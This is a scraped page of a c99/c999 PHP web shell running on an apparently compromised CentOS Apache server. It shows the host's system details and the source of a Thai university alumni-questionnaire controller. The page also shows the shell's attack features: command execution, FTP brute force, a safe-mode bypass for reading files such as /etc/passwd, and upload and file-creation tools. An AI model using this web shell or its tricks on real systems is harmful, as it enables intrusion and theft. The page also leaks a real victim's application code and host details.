!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     query.php (8.74 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('ea_controller.php');
class 
Query extends Ea_controller {

//    function __construct() {
//        parent::Controller();
//    }
    
function qn_input() {
    
        
$this->output($this->config->item("ea_folder")."v_searchAlumniForQn");
    }
    function 
qn_search() {
        
$this->load->model($this->config->item("ea_folder").'mo_alumnimain','am');

        if(
$this->input->post('studentCode')!="" || $this->input->post('studentName')!="" || $this->input->post('curName')!="" || $this->input->post('admitAcadYear')!="") {
                
$this->contents['rs_am'] = $this->am->qryAmByLikeNameAndCurAndAdY($this->input->post('studentCode'),$this->input->post('studentName'),$this->input->post('curName'),$this->input->post('admitAcadYear'));

        } else if(
$this->input->post('search'))
                
$this->contents['err_msg'] = "กรุณาป้อนคำค้นลงในช่องใดช่องหนึ่ง";

        
$this->output($this->config->item("ea_folder")."v_searchAlumniForQn");
    }
    function 
qn_detail() {
        
$this->load->model($this->config->item("ea_folder").'mo_alumnimain','am');
        
$this->contents['qu_am'] = $this->am->qryAmWhereAlumniId($this->input->post('alumniId'));
        
        
$this->load->model($this->config->item("ea_folder").'mo_alumniqn','aq');

        
$this->contents['qu_aq'] = $this->aq->qryAqJoinHw($this->input->post('alumniId'));
        
$seqId=$this->contents['qu_aq']->num_rows();
        
$this->contents['qu_aq'] = $this->aq->qryAqWhereAlumniIdAndSeqId($this->input->post('alumniId'),$seqId);
        
$this->output($this->config->item("ea_folder")."v_alumniforQn");
    }
    function 
qn_save() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<font color="red">','</font>');
        
$this->form_validation->set_rules('currentPhoneNo','เบอร์โทรศัพท์','trim|required|xss_clean');
        
$this->form_validation->set_rules('studentEmail','อีเมลล์','trim|required|valid_email');
        
$this->form_validation->set_rules('checkwork','ข้อมูลหลังสำเร็จการศึกษา','trim|required|xss_clean');
        
$this->form_validation->set_rules('workPosition','สถานะการทำงาน','trim|xss_clean');
        
$this->form_validation->set_rules('officeName','สถานที่ปฏิบัติงาน','trim|xss_clean');
        
$this->form_validation->set_rules('officeAddress','ที่อยู่ที่ทำงาน','trim|xss_clean');
        
$this->form_validation->set_rules('offDistrictId','ตำบล','trim|xss_clean');
        
$this->form_validation->set_rules('offDistrictName','ตำบล','trim|xss_clean');
        
$this->form_validation->set_rules('offAmphurId','อำเภอ','trim|xss_clean');
        
$this->form_validation->set_rules('offAmphurName','อำเภอ','trim|xss_clean');
        
$this->form_validation->set_rules('offProvinceId','จังหวัด','trim|xss_clean');
        
$this->form_validation->set_rules('offProvinceName','จังหวัด','trim|xss_clean');
        
$this->form_validation->set_rules('officeZipcode','รหัสไปรษณีย์','trim|xss_clean');
        
$this->form_validation->set_rules('officePhoneNo','เบอร์โทรศัพท์','trim|xss_clean');
        
$this->form_validation->set_rules('workPosition','ตำแหน่งงาน','trim|xss_clean');
        
$this->form_validation->set_rules('workSalary1','อัตราเงินเดือน','trim|xss_clean');
        
$this->form_validation->set_rules('workSalary2','อัตราเงินพิเศษ','trim|xss_clean');
        
$this->form_validation->set_rules('leveleduId','ระดับการศึกษา','trim|xss_clean');
        
$this->form_validation->set_rules('leveleduName','ระดับการศึกษา','trim|xss_clean');
        
$this->form_validation->set_rules('meduId','สาขา','trim|xss_clean');
        
$this->form_validation->set_rules('meduName','สาขา','trim|xss_clean');
        
$this->form_validation->set_rules('eduId',' สถานศึกษา','trim|xss_clean');
        
$this->form_validation->set_rules('eduName',' สถานศึกษา','trim|xss_clean');
        
$this->form_validation->set_rules('investiture','การเข้าร่วมพิธีพระราชทานประกาศนียบัตร','trim|required|xss_clean');

        if(
$this->form_validation->run() == true) {

            
$this->load->model($this->config->item("ea_folder").'mo_alumniqn','aq');

            
//$qnId = $this->aq->qryQnByMaxQnId($this->input->post('alumniId'));
            //$this->aq->qnId = $qnId;
            
$this->aq->qnId '';
            
$this->aq->alumniId $this->input->post('alumniId');
            
$this->aq->checkwork $this->input->post('checkwork');
            if (
$this->input->post('checkwork')=="N"){
                
$this->aq->checkedu "Y";
            } else if(
$this->input->post('checkwork')=="Y"){
                
$this->aq->checkedu "N";
            } else {
                
$this->aq->checkedu "W";
            }
            
$this->aq->checkProfession $this->input->post('checkprofession');
            
$this->aq->startDateWork $this->input->post('startDateWork');
            
$this->aq->workPosition $this->input->post('workPosition');
            
$this->aq->workSalary1 $this->input->post('workSalary1');
            
$this->aq->workSalary2 $this->input->post('workSalary2');
            
$this->aq->leveleduId $this->input->post('leveleduId');
            
$this->aq->majoreduId $this->input->post('meduId');
            
$this->aq->educationId $this->input->post('eduId');
            
$this->aq->investiture $this->input->post('investiture');
            
$this->aq->updateByPerson date('Y-m-d H:i:s');
            
$this->aq->writeDate $this->session->userdata("UsName");
            
$this->aq->insert();

            
$this->load->model($this->config->item("ea_folder").'mo_hiswork','hw');

            
$seqId $this->hw->qryHwByMaxSeqId($this->input->post('alumniId'));
            
$this->hw->seqId $seqId;
            
$this->hw->alumniId $this->input->post('alumniId');
            
$this->hw->companyNameT $this->input->post('officeName');
            
$this->hw->companyAddr $this->input->post('officeAddress');
            
$this->hw->companyPosition $this->input->post('workPosition');

            
//$this->hw->companyAdmidPosYear = $this->input->post('oldPfName');
            
$this->hw->insert();

            
$this->load->model($this->config->item("ea_folder").'mo_alumnibio','ab');
            
$this->ab->alumniId $this->input->post('alumniId');
            
$this->ab->officeName $this->input->post('officeName');
            
$this->ab->officeAddress $this->input->post('officeAddress');
            
$this->ab->officeDistrictId $this->input->post('districtId');
            
$this->ab->officeAmphurId $this->input->post('amphurId');
            
$this->ab->officeProvinceId $this->input->post('provinceId');
            
$this->ab->officeZipcode $this->input->post('officeZipcode');
            
$this->ab->officePhoneNo $this->input->post('officePhoneNo');
            
$this->ab->workingStatus $this->input->post('checkwork');
            
$this->ab->workingPosition $this->input->post('workPosition');
            
$this->ab->workingSalary1 $this->input->post('workSalary1');
            
$this->ab->workingSalary2 $this->input->post('workSalary2');
            
$this->ab->update();
            
            
redirect($this->config->item("ea_folder")."query/qn_input");
        }
        else
            
$this->qn_detail();
    }

    function 
setqn_input() {
        
$this->load->model($this->config->item("ea_folder").'mo_timeqn','sqn');
        
$this->sqn->seqId $this->input->post('seqId');
        
$this->contents['qu_sqn'] = $this->sqn->get_by_key();
    
        
$this->output($this->config->item("ea_folder")."v_settimeForQn"$this->session->flashdata('msg'));
    }

    function 
setqn_save() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<font color="red">','<font color="red">');
        
$this->form_validation->set_rules('yearQn','ปีการศึกษา','trim|required|xss_clean');
        
$this->form_validation->set_rules('startDate','วันที่เริ่มต้น','trim|callback_checkTmcFrDate[tmcToDate]|xss_clean');
        
$this->form_validation->set_rules('endDate','วันที่สิ้นสุด','trim|callback_checkTmcToDate[tmcFrDate]|xss_clean');

        
$flgmsg 0;
        
        if(
$this->form_validation->run() == true) {
            
$this->load->model($this->config->item("ea_folder").'mo_timeqn','tqn');
            
$this->tqn->seqId '';
            
$this->tqn->yearQn $this->input->post('yearQn');
            
$startDate splitDateForm2($this->input->post('startDate'),'-');
            
$endDate splitDateForm2($this->input->post('endDate'),'-');
            
$this->tqn->startDate $startDate;
            
$this->tqn->endDate $endDate;
            
$this->tqn->insert();
            
$flgmsg 1;

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                if(
$flgmsg)
                    
$this->session->set_flashdata('msg'2);
                } else {
                
$this->db->trans_commit();
                if(
$flgmsg)
                    
$this->session->set_flashdata('msg'1);
            }
            
redirect($this->config->item("ea_folder")."query/setqn_input");
        } else {
            
$this->setqn_input();
        }
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0125 ]--